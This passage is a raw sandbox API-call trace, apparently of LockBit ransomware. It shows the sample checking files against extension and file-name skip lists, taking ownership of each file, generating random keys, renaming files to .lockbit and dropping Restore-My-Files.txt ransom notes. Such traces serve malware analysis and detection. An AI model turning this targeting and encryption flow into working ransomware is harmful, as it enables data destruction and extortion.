lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.624] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.624] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.624] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.624] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.624] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.624] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047x576black.png") returned 1 [0087.624] lstrcmpiW (lpString1="ntldr", lpString2="1047x576black.png") returned 1 [0087.624] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047x576black.png") returned 1 [0087.624] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047x576black.png") returned 1 [0087.625] lstrcmpiW (lpString1="autorun.inf", lpString2="1047x576black.png") returned 1 [0087.625] lstrcmpiW (lpString1="thumbs.db", lpString2="1047x576black.png") returned 1 [0087.625] lstrcmpiW (lpString1="iconcache.db", lpString2="1047x576black.png") returned 1 [0087.625] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.625] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png") returned=".png" [0087.625] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.625] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.625] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.625] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.625] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.625] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.625] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.625] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.625] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.625] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.626] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.626] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.626] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.626] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.626] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.626] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.627] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.627] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.627] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png.lockbit") returned 86 [0087.627] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.627] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.628] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.628] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.628] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.628] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.628] RtlFreeAnsiString (AnsiString="\\") [0087.628] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c8) returned 0x0 [0087.628] malloc (_Size=0x200) returned 0x77d800 [0087.628] NtQueryInformationToken (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.628] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.628] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.629] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.629] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.630] CloseHandle (hObject=0x3c8) returned 1 [0087.630] free (_Block=0x77d800) [0087.630] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c8 [0087.630] CreateIoCompletionPort (FileHandle=0x3c8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.630] malloc (_Size=0x40068) returned 0x3e700e8 [0087.630] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0x3e70100 | out: lpFileSize=0x3e70100*=4570) returned 1 [0087.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.631] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb011c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb011c) returned 0x0 [0087.631] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb012c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb012c) returned 0x0 [0087.734] ReadFile (in: hFile=0x3c8, lpBuffer=0x3e7011c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8) returned 1 [0087.736] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.736] malloc (_Size=0xc2) returned 0x3e70008 [0087.736] NtSetInformationFile (FileHandle=0x3c8, IoStatusBlock=0x3d6aa8c, FileInformation=0x3e70008, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0087.737] free (_Block=0x3e70008) [0087.737] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.737] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.737] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0087.738] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.738] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.738] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.739] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f4df463, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f4df463, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc22bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xca59, dwReserved0=0x0, dwReserved1=0x0, cFileName="mainscroll.png", cAlternateFileName="")) returned 1 [0087.739] lstrcmpiW (lpString1=".", lpString2="mainscroll.png") returned -1 [0087.739] lstrcmpiW (lpString1="..", lpString2="mainscroll.png") returned -1 [0087.739] PathFindExtensionW (pszPath="mainscroll.png") returned=".png" [0087.739] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.739] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.740] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.740] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.740] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.741] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.741] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.741] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.741] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.741] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.741] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.741] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.741] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.741] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.742] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.742] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.742] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.742] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.742] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="mainscroll.png") returned 1 [0087.742] lstrcmpiW (lpString1="ntldr", lpString2="mainscroll.png") returned 1 [0087.742] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="mainscroll.png") returned 1 [0087.742] lstrcmpiW (lpString1="bootsect.bak", lpString2="mainscroll.png") returned -1 [0087.742] lstrcmpiW (lpString1="autorun.inf", lpString2="mainscroll.png") returned -1 [0087.742] lstrcmpiW (lpString1="thumbs.db", lpString2="mainscroll.png") returned 1 [0087.742] lstrcmpiW (lpString1="iconcache.db", lpString2="mainscroll.png") returned -1 [0087.742] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.742] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png") returned=".png" [0087.742] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.742] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.742] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.742] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.742] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.742] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.742] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.742] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.742] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.743] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.743] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.743] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.743] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.743] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.743] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.743] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.743] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.743] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png.lockbit") returned 83 [0087.743] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\mainscroll.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.748] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.749] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.749] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.749] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.750] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.750] RtlFreeAnsiString (AnsiString="\\") [0087.750] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0087.750] malloc (_Size=0x200) returned 0x77d800 [0087.750] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.750] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.750] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.750] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.751] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.751] CloseHandle (hObject=0x3b8) returned 1 [0087.751] free (_Block=0x77d800) [0087.752] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\mainscroll.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0087.752] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.752] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.752] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=51801) returned 1 [0087.752] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.753] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.753] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0087.753] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0087.754] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.757] malloc (_Size=0xbc) returned 0x3e70008 [0087.757] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x3e70008, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0087.758] free (_Block=0x3e70008) [0087.758] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.758] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.758] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.758] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5e9dee, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5e9dee, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc22bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0087.758] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0087.759] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0087.759] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0087.759] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.759] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.759] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.759] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.759] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.759] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.759] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.759] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.759] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.759] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.760] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.760] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.760] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.760] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.760] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.760] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.760] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.760] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.760] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.760] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.760] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.761] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.761] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.761] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.761] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.761] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.761] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.761] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.761] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.761] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.761] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.761] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.761] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.761] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.762] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.762] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.762] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.762] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.762] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.762] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.762] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.762] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.762] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.762] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.762] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.762] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.763] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.763] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0087.763] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0087.763] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0087.763] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0087.763] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0087.763] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0087.763] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0087.763] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.763] PathFindExtensionW (pszPath="C:\\\\Program 